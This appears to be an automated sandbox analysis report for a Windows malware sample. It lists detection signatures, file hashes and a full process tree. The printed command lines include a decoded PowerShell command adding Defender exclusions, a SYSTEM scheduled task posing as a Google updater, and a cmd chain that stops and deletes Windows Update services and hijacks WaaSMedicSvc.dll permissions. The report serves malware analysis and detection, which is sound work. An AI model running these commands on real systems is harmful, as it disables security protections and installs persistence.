Analysis
- Max time kernel: 169s
- Max time network: 182s
- Platform: windows10-2004_x64
- Resource: win10v2004-20220414-en
- Submitted: 14-07-2022 03:01
- Static task: static1
- Behavioral task: behavioral1
- Sample: be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe
- Resource: win7-20220414-en
General
- Target: be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe
- Size: 7.5MB
- MD5: a29f3494661a52e3c66a2908389c5010
- SHA1: 1645351e4b00a678ad7c4ac7784bf8d9c8703297
- SHA256: be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266
- SHA512: 1b1314867540a94f60a7075c9021981ede269fda29411eba9b9ed33790010c0f836235c27938eccb5d592cb552d283cdf39ddaf9d28ab3d4d252ba82ada8e25e
Malware Config
Signatures

Modifies security service (2 TTPs, 5 IoCs)
Processes:
- reg.exe: Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters
- reg.exe: Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security
- reg.exe: Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0
- reg.exe: Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1
- reg.exe: Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 1 IoC)
Processes:
- setup.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Drops file in Drivers directory (1 IoC)
Processes:
- conhost.exe: File opened for modification C:\Windows\system32\drivers\etc\hosts

Executes dropped EXE (1 IoC)
Processes:
- PID 4600 setup.exe

Possible privilege escalation attempt (2 IoCs)
Processes:
- PID 4600 icacls.exe
- PID 3216 takeown.exe

Stops running service(s) (3 TTPs)

Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes:
- setup.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
- setup.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes:
- be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe: Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation

Drops startup file (2 IoCs)
Processes:
- cmd.exe: File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lol.bat
- cmd.exe: File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lol.bat

Modifies file permissions (1 TTP, 2 IoCs)
Processes:
- PID 3216 takeown.exe
- PID 4600 icacls.exe

YARA rule matches: themida
Processes:
- C:\Windows\Temp\setup.exe: themida
- C:\Windows\Temp\setup.exe: themida
- behavioral2/memory/4600-135-0x0000000000400000-0x00000000010BD000-memory.dmp: themida
- behavioral2/memory/4600-138-0x0000000000400000-0x00000000010BD000-memory.dmp: themida
- behavioral2/memory/4600-152-0x0000000000400000-0x00000000010BD000-memory.dmp: themida
- behavioral2/memory/4600-157-0x0000000000400000-0x00000000010BD000-memory.dmp: themida

Checks whether UAC is enabled
Processes:
- setup.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA

Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
Processes:
- PID 4600 setup.exe
Launches sc.exe (5 IoCs)
sc.exe is a Windows utility to control services on the system.
Processes:
- PID 1384 sc.exe
- PID 1672 sc.exe
- PID 3548 sc.exe
- PID 3348 sc.exe
- PID 3108 sc.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
- msedge.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer
- msedge.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName
- msedge.exe: Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS

Modifies registry class (1 IoC)
Processes:
- msedge.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\

Modifies registry key (1 TTP, 9 IoCs)
Processes:
- PID 3904 reg.exe
- PID 2288 reg.exe
- PID 4804 reg.exe
- PID 1468 reg.exe
- PID 3352 reg.exe
- PID 2052 reg.exe
- PID 2384 reg.exe
- PID 4336 reg.exe
- PID 1336 reg.exe

Suspicious behavior: EnumeratesProcesses (7 IoCs)
Processes:
- PID 3928 msedge.exe
- PID 3928 msedge.exe
- PID 3356 msedge.exe
- PID 3356 msedge.exe
- PID 1976 powershell.exe
- PID 1976 powershell.exe
- PID 3628 conhost.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (7 IoCs)
Processes:
- PID 3356 msedge.exe (reported 7 times)

Suspicious use of AdjustPrivilegeToken (11 IoCs)
Processes:
- PID 1976 powershell.exe: Token: SeDebugPrivilege
- PID 2608 powercfg.exe: Token: SeShutdownPrivilege
- PID 2608 powercfg.exe: Token: SeCreatePagefilePrivilege
- PID 2480 powercfg.exe: Token: SeShutdownPrivilege
- PID 2480 powercfg.exe: Token: SeCreatePagefilePrivilege
- PID 3628 conhost.exe: Token: SeDebugPrivilege
- PID 2960 powercfg.exe: Token: SeShutdownPrivilege
- PID 2960 powercfg.exe: Token: SeCreatePagefilePrivilege
- PID 4548 powercfg.exe: Token: SeShutdownPrivilege
- PID 4548 powercfg.exe: Token: SeCreatePagefilePrivilege
- PID 3216 takeown.exe: Token: SeTakeOwnershipPrivilege

Suspicious use of FindShellTrayWindow (2 IoCs)
Processes:
- PID 3356 msedge.exe
- PID 3356 msedge.exe

Suspicious use of WriteProcessMemory (64 IoCs)
Processes: parent-to-child memory writes between the processes in the tree below (be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe to setup.exe and to cmd.exe, cmd.exe to msedge.exe, and the msedge.exe browser process to its own child msedge.exe processes).
Processes
Each entry shows the image path, the command line, the signatures it triggered and its PID; [N] is the nesting depth in the process tree.

[1] C:\Users\Admin\AppData\Local\Temp\be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID: 4872

[2] C:\Windows\Temp\setup.exe
    Command line: "C:\Windows\Temp\setup.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID: 4600

[3] C:\Windows\System32\conhost.exe
    Command line: "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
    - Drops file in Drivers directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 3628

[4] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
    PID: 5024

[5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
    Decoded -EncodedCommand (base64 of UTF-16LE, decoded here for readability): <#cbz#> Add-MpPreference <#nl#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#rgl#> -Force <#gzl#>
    The decoded command adds Microsoft Defender path exclusions for the user profile and the system drive; the <#...#> block comments are filler.
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 1976

[4] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
    PID: 3700

[5] C:\Windows\system32\schtasks.exe
    Command line: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
    - Creates scheduled task(s)
    PID: 4144

[4] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    PID: 2756

[4] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    PID: 4124

[5] C:\Windows\system32\schtasks.exe
    Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
    PID: 2680

[5] C:\Windows\system32\schtasks.exe
    Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    PID: 2060

[5] C:\Windows\system32\schtasks.exe
    Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
    PID: 3068

[5] C:\Windows\system32\schtasks.exe
    Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
    PID: 3920

[5] C:\Windows\system32\schtasks.exe
    Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
    PID: 4924

[5] C:\Windows\system32\schtasks.exe
    Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
    PID: 3220

[5] C:\Windows\system32\schtasks.exe
    Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
    PID: 532

[5] C:\Windows\system32\reg.exe
    Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
    - Modifies registry key
    PID: 4804

[5] C:\Windows\system32\reg.exe
    Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
    - Modifies registry key
    PID: 1468

[5] C:\Windows\system32\reg.exe
    Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
    - Modifies registry key
    PID: 3352

[5] C:\Windows\system32\reg.exe
    Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
    - Modifies registry key
    PID: 4336

[4] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
    PID: 4620

[2] C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\run.bat" "
    - Drops startup file
    PID: 4884

[2] C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\lol.bat" "
    - Suspicious use of WriteProcessMemory
    PID: 4904

[3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://take-realprize.life/?u=lq1pd08&o=hdck0gl
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID: 3356

[4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffecd2146f8,0x7ffecd214708,0x7ffecd214718
    PID: 544

[4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
    PID: 3772

[4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 /prefetch:3
    - Suspicious behavior: EnumeratesProcesses
    PID: 3928

[4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:8
    PID: 4132

[4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
    PID: 3672

[4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
    PID: 1456

[4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5392 /prefetch:8
    PID: 616

[4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1444 /prefetch:1
    PID: 1452

[4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1
    PID: 1120

[4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
    PID: 4220

[4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:1
    PID: 1652

[4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:1
    PID: 4944

[1] C:\Windows\System32\CompPkgSrv.exe
    Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
    PID: 1152

[1] C:\Windows\system32\powercfg.exe
    Command line: powercfg /x -hibernate-timeout-ac 0
    - Suspicious use of AdjustPrivilegeToken
    PID: 2608

[1] C:\Windows\system32\sc.exe
    Command line: sc stop bits
    - Launches sc.exe
    PID: 1384

[1] C:\Windows\system32\powercfg.exe
    Command line: powercfg /x -standby-timeout-ac 0
    - Suspicious use of AdjustPrivilegeToken
    PID: 2960

[1] C:\Windows\system32\reg.exe
    Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
    - Modifies registry key
    PID: 2052

[1] C:\Windows\system32\reg.exe
    Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
    - Modifies registry key
    PID: 3904

[1] C:\Windows\system32\reg.exe
    Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
    - Modifies registry key
    PID: 2288

[1] C:\Windows\system32\icacls.exe
    Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID: 4600

[1] C:\Windows\system32\takeown.exe
    Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID: 3216

[1] C:\Windows\system32\reg.exe
    Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
    - Modifies registry key
    PID: 1336

[1] C:\Windows\system32\reg.exe
    Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
    - Modifies security service
    - Modifies registry key
    PID: 2384

[1] C:\Windows\system32\powercfg.exe
    Command line: powercfg /x -standby-timeout-dc 0
    - Suspicious use of AdjustPrivilegeToken
    PID: 4548

[1] C:\Windows\system32\sc.exe
    Command line: sc stop dosvc
    - Launches sc.exe
    PID: 1672

[1] C:\Windows\system32\powercfg.exe
    Command line: powercfg /x -hibernate-timeout-dc 0
    - Suspicious use of AdjustPrivilegeToken
    PID: 2480

[1] C:\Windows\system32\sc.exe
    Command line: sc stop wuauserv
    - Launches sc.exe
    PID: 3548

[1] C:\Windows\system32\sc.exe
    Command line: sc stop WaaSMedicSvc
    - Launches sc.exe
    PID: 3348

[1] C:\Windows\system32\sc.exe
    Command line: sc stop UsoSvc
    - Launches sc.exe
    PID: 3108

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks /run /tn "GoogleUpdateTaskMachineQC"
    PID: 3740
Network
MITRE ATT&CK Enterprise v6
Downloads

- C:\Windows\Temp\lol.bat
  Filesize: 59B
  MD5: f580e0e80cc87b25e38ea2c0c8059d04
  SHA1: 299f51dca9c609d6da86f93c424e39c1e6ba0d94
  SHA256: 9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734
  SHA512: 5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

- C:\Windows\Temp\run.bat
  Filesize: 98B
  MD5: 731afe244b2414169a5f630d52646e56
  SHA1: e3771ccdccd8c306ee5fc4f264cfc3310690458c
  SHA256: 6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552
  SHA512: 84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

- C:\Windows\Temp\setup.exe
  Filesize: 7.3MB
  MD5: 0c9bed327840bbe964e85913d5868fcb
  SHA1: ef0b874b57be491ae87ed0237a025d5580265218
  SHA256: 3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad
  SHA512: 12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

- C:\Windows\system32\drivers\etc\hosts
  Filesize: 1KB
  MD5: f3f6968a4c0f457f427eb17f7cc5f68b
  SHA1: 872933578f4b7d555158189ed02015f192daa7c6
  SHA256: 774ad8ef51d495bfec8b3e3d058210d5ce715c66f76008f1e4f2b6203d33e41c
  SHA512: 5dafd8fb0cae325865c0a897e3719250903ac5da72b0fa5006ebda505ee625cd9eacf09c5043c3b3648a5677e96c87f1f2995712471cd1539cd9c73a7e3d0d49

- \??\pipe\LOCAL\crashpad_3356_ARDPQXNSIEZNRVKE (no size recorded; the digests below are those of zero-length content)
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e